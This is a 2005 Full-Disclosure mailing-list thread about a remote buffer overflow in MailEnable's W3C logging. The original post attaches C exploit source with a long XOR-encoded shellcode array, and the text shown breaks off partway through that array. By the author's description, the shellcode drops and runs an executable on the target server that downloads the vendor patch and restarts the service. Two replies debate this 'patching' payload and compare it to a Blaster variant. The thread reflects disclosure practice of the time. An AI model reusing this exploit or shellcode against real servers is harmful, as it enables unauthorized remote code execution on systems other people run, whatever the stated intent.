Re: [Full-disclosure] MailEnable W3C Logging Remote Buffer Overflow Proof of Concept

2005-10-07 Thread advisory 
“We will patch you even if you want it or not ? :D”
 First and foremost, This POC was designed for use network administrators
on their own network. We never intended this to be converted into a bot
and spread. I can’t see how a bot that systematically disables its
victims would spread that well anyway. We are attempting to facilitate
the previously tedious job of patching multiple machines on a given
network. Only those with malicious intent should find annoyance in this
advisory.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MailEnable W3C Logging Remote Buffer Overflow Proof of Concept

2005-10-07 Thread user1 
[EMAIL PROTECTED] wrote:

> The buffer used provides quite a bit of room for shellcode, so I've decided
> to construct a shellcode that as far as I know hasn't been made.

I've seen this kind of thing on a blaster variant (With the notable
exeption that it was also trying to spread like any other worm).
It is a nice poc, but I don't think it has real uses. We will patch you
even if you want it or not ? :D
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] MailEnable W3C Logging Remote Buffer Overflow Proof of Concept

2005-10-07 Thread advisory 
Attached is a proof of concept for the MailEnable W3C Logging
vulnerability. It features a special type of patching shellcode designed
to quickly and easily secure this vulnerability across your network.

I am releasing this in hopes that other POC writers will follow suit,
releasing exploits that patch the vulnerability rather then exploit it for
a malicious purpose. The reason this is being done is to support the admin
rather then to support the hacker./*
MailEnable W3C Logging Remote Buffer Overflow Proof of Concept

This is a pretty standard stack overflow with a SE handler overwrite.
The buffer used provides quite a bit of room for shellcode, so I've decided
to construct a shellcode that as far as I know hasn't been made. The 
shellcode provided will transport a 1008 byte win32 PE executable file. The 
shellcode
will then save it to disk, run the executable, and close the server. The 
executable will serve as a small patching tool, which will download the
patch provided by mailenable.com,unzip it, restart the service, and copy 
the patched exe. This shellcode will eliminate the very hole it used to gain
access. The old server executable will not be deleted, merely renamed to 
_MEIMAPS.exe. 

For those paranoid individuals who cannot read C code, YOUR-Address can be
anything as long as the length is the same as the real IP. If your IP is 
192.168.0.1, then 111.222.3.4 will work fine. We're only using it to 
calculate the length of the buffer for stack alignment. As you can see,
there is no call home code here :)

If you have any questions about this exploit, or how you may use it on 
your network to quickly patch your Mail Enable installations, please feel free 
to e-mail us
at [EMAIL PROTECTED]
*/

#include 
#include 
#include 

#pragma comment(lib,"ws2_32")

long gimmeip(char *hostname);
void makeSpaceTaker(char *buff, int len);
char buffer[7300];
//Simple XOR'd 2-stage shellcode
//Some parts of this shellcode were taken from vlad902's toolset.
//Saves omg.exe to disk and runs.
char patchshell[]=
"\xEB\x17\x31\xC0\x66\xB8\x02\x05\x8B\x34"
"\x24\x66\x81\x36\x1E\x17\x83\xC6\x02\x83"
"\xE8\x02\x75\xF3\xC3\xE8\xE4\xFF\xFF\xFF"
"\xE2\xFF\xFB\x17\x1E\x17\x48\x9C\x5B\x2B"
"\x95\x6B\x1B\x6F\x1F\xF8\x95\x58\x06\x9C"
"\x41\x37\x1F\xFC\xFD\x39\x57\x9C\x2A\x9C"
"\x1F\xF9\x2F\xD7\x87\xBB\x9A\xD7\x6A\x10"
"\xDF\xDD\x13\x16\xDC\xFC\xEA\x2C\x4A\x33"
"\x16\x62\xFD\x9C\x41\x33\x1F\xFC\x78\x9C"
"\x12\x5C\x95\x48\x02\x16\xF5\x9C\x02\x9C"
"\x1F\xFC\x40\xD4\x76\x61\x73\xA7\x5B\xE8"
"\xC8\x43\x41\x41\x76\x17\x1F\x17\x1E\x40"
"\x76\x17\x1E\x17\x1E\xE8\xCD\x49\x1F\xF7"
"\x56\x97\x26\x4B\x6B\xED\xD8\x17\x1E\x7F"
"\x51\x14\xD9\xA8\xE1\xC1\x44\x43\xE1\xC4"
"\x76\xB2\x09\x17\x62\xE8\xC8\x7F\x7B\x6F"
"\x7B\x17\x76\x78\x73\x70\x30\x9E\xFF\x41"
"\x74\x17\x74\x17\x74\x13\x74\x17\x74\x17"
"\x74\x15\x4F\xE8\xCD\x49\x4E\x7F\x01\x6E"
"\x14\xFF\xE1\xC1\x46\x4F\x48\x47\x74\x17"
"\xF5\x4B\x44\x45\x76\xE7\x1D\x17\x1E\x96"
"\xDC\x13\x1E\x17\x1E\x45\x4E\xE8\xCD\x7F"
"\xE5\x80\xE3\x18\xE1\xC1\x46\x4F\x48\x47"
"\xE1\xC4\x40\x7F\x60\xCF\xFC\x64\xE1\xC1"
"\x97\x0B\x3A\x7F\x86\xE9\x94\x19\xE1\xC1"
"\x47\x9E\xFF\x96\xDF\x1F\x1E\x17\x1E\x7D"
"\x1E\x46\xE1\xC4\xDD\x26\xE8\x73\x95\x61"
"\x06\xBA\xB3\x9C\x76\xF3\x53\x71\x2F\xFA"
"\x78\x96\x63\x17\x53\x4D\x6B\xE3\x40\xFE"
"\x5C\xE8\xE1\xE8\xF6\x88\xE1\xE8\xE1\x56"
"\x5C\x54\x5A\x5A\x44\x87\x1E\x14\x1E\x17"
"\x1E\x13\x1E\x17\x1E\xE8\xE1\x17\x1E\xAF"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x57\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x97\x1E\x17\x1E\x19\x01\xAD"
"\x10\x17\xAA\x1E\xD3\x36\xA6\x16\x52\xDA"
"\x3F\x43\x76\x7E\x6D\x37\x6E\x65\x71\x70"
"\x6C\x76\x73\x37\x7D\x76\x70\x79\x71\x63"
"\x3E\x75\x7B\x37\x6C\x62\x70\x37\x77\x79"
"\x3E\x53\x51\x44\x3E\x7A\x71\x73\x7B\x39"
"\x13\x1A\x14\x33\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x47\x5B\x17\x1E\x5B\x1F\x16\x1E\xCF"
"\x35\x2D\x5D\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\xF7\x1E\x18\x1F\x1C\x1F\x15\x2C\x47"
"\x1C\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x57\x1C\x17\x1E\xB7\x1F\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x57\x1E\x07\x1E\x17"
"\x1E\x07\x1E\x17\x1E\x13\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x13\x1E\x17\x1E\x17\x1E\x17"
"\x1E\xE7\x1D\x17\x1E\xB7\x1F\x17\x1E\x17"
"\x1E\x17\x1E\x14\x1E\x17\x1E\x17\x1E\x07"
"\x1E\x17\x0E\x17\x1E\x17\x1E\x07\x1E\x17"
"\x0E\x17\x1E\x17\x1E\x17\x1E\x07\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x0F"
"\x1D\x17\x1E\x3F\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x77\x1D\x17"
"\x1E\x37\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x39"
"\x6A\x72\x66\x63\x1E\x17\x1E\x5F\x1C